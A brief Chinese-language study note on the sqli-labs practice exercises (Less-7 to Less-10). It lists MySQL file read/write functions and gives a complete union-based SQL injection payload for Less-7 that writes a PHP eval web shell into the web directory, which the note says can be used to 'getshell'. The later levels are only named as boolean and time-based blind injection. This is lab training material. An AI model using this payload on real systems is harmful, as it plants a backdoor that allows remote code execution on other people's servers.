常用路径:
https://www.cnblogs.com/lcamry/p/5729087.html
文件导入导出操作:
load_file('文件名') #导出文件,需要文件的绝对路径
load data infile '文件名' #向数据库导入文件
Select ... into outfile '文件名' #写入到文件,该文件之前不存在
#当load_file无法导出数据到前端的时候,可以利用该语句将服务器当中的内容导入到 web 服务器下的目录得到数据
select load_file('文件名')into outfile '文件名'
Less-7
?id=1')) union select 1,2,'<?php @eval($_post["mima"])?>' into outfile "D:\\phpStudy\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\yijuhua.php" --+
在D:\phpStudy\phpstudy_pro\WWW\sqli-labs-master\Less-7\目录下可以看到写入的.php文件,可与工具结合getshell
Less-8
布尔盲注
Less-9、10
时间盲注,正确与错误页面差别不大,不好区分,同时报错函数被屏蔽,无法使用基于报错的盲注
费时间